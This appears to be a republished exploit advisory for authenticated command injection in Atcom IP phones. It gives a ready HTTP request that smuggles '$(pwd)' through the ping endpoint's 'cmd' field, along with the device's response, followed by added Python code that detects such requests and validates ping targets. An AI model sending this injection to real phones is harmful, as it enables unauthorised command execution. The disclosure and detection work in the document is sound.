## https://sploitus.com/exploit?id=PACKETSTORM:175016
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection  
# Google Dork: N/A  
# Date: 07/09/2023  
# Exploit Author: Mohammed Adel  
# Vendor Homepage: https://www.atcom.cn/  
# Software Link: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html  
# Version: All versions above 2.7.x.x  
# Tested on: Kali Linux  
  
  
Exploit Request:  
  
POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1  
Host: {TARGET_IP}  
User-Agent: polar  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 49  
Authorization: Digest username="admin", realm="IP Phone Web Configuration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here"  
  
cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping  
  
  
Response:  
  
{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}  
  
The value of "ping_cmd_result" is base64-encoded. Decoding it reveals the output of the injected command, as shown below:  
  
ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
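The following is an added defender-side example, not code from the advisory or the vendor: it decodes the base64 "ping_cmd_result" field shown above, flags a captured "cmd" parameter that is not a plain IP literal or that carries shell metacharacters, and shows the hardened argv-list form a ping endpoint should use instead of a shell command line. The function names and the argv helper are hypothetical; the sample request body and response are copied from the advisory.

```python
import base64
import ipaddress
import json
import re
from urllib.parse import parse_qs

# Shell metacharacters that let a ping argument escape into a shell command line;
# the advisory's payload relies on "$(...)" command substitution.
SHELL_META = re.compile(r"[;&|`$(){}<>\\\n'\"]")

def is_ip_literal(value: str) -> bool:
    """True only for a bare IPv4/IPv6 address, the only input a ping endpoint needs."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def build_ping_argv(target: str, count: int = 1) -> list[str]:
    """Hardened form (hypothetical helper): validate first, then return an argv list
    for subprocess.run without shell=True, so metacharacters never reach a shell."""
    if not is_ip_literal(target):
        raise ValueError(f"refusing non-IP ping target: {target!r}")
    return ["ping", "-c", str(count), target]

def flag_ping_request(body: str) -> list[str]:
    """Detection: report any 'cmd' value in a captured user_get_phone_ping POST body
    that is not a plain IP literal or that carries shell metacharacters."""
    findings = []
    for target in parse_qs(body, keep_blank_values=True).get("cmd", []):
        if not is_ip_literal(target):
            findings.append(f"cmd is not an IP literal: {target!r}")
        if SHELL_META.search(target):
            findings.append(f"cmd contains shell metacharacters: {target!r}")
    return findings

def decode_ping_result(response_body: str) -> str:
    """Decode the base64 'ping_cmd_result' field of the device's JSON response."""
    data = json.loads(response_body)
    return base64.b64decode(data["ping_cmd_result"]).decode("utf-8", "replace")

# Constructed samples, copied from the request body and response in the advisory.
SAMPLE_BODY = "cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping"
SAMPLE_RESPONSE = (
    '{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK",'
    '"ping_cmd":"0.0.0.0$(pwd)"}'
)
```

Running flag_ping_request over the advisory's body yields two findings, while a body whose cmd is a bare address such as 192.0.2.1 yields none.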